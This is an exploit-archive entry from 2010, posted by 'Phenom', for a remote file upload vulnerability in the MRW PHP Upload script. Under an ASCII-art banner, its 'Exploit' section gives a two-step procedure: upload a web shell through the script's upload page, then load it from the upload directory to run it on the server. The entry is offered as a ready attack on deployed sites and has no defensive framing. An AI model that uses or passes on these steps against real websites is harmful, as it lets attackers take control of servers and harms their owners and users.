[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MRW PHP Upload Remote file upload Vulnerability
# Published : 2010-02-13
# Author : Phenom
# Previous Title : southburn Web (products.php) Sql Injection Vulnerability
# Next Title : StatCounteX 3.1 Multiple Vulnerabilities


# Date: 12/02/2010
# Author: Phenom
# Software Link: http://www.mrwebmaster.it/_store/script/php_luke_mrw_upload.zip
# Version: 
# Tested on: Windows xp sp3

------------------------------------------------------

 _____  _                                
|  __ | |                               
| |__) | |__   ___ _ __   ___  _ __ ___  
|  ___/| '_  / _  '_  / _/| '_ ` _  
| |    | | | |  __/ | | | (_) | | | | | |
|_|    |_| |_|___|_| |_|/__/|_| |_| |_|


------------------------------------------------------

#######   MRW PHP Upload Remote File Upload Vulnerability   #####################
#
#       Author : Phenom
#
#       vendor : www.lukeonweb.net
#
#################################################################################

####### Exploit #################################################################
#
#     1- http://site.com/path/upload.html
#
#         upload your shell 
#
#     2- http://site.com/path/upload/yourshell.php
#
#         get your shell
#
#################################################################################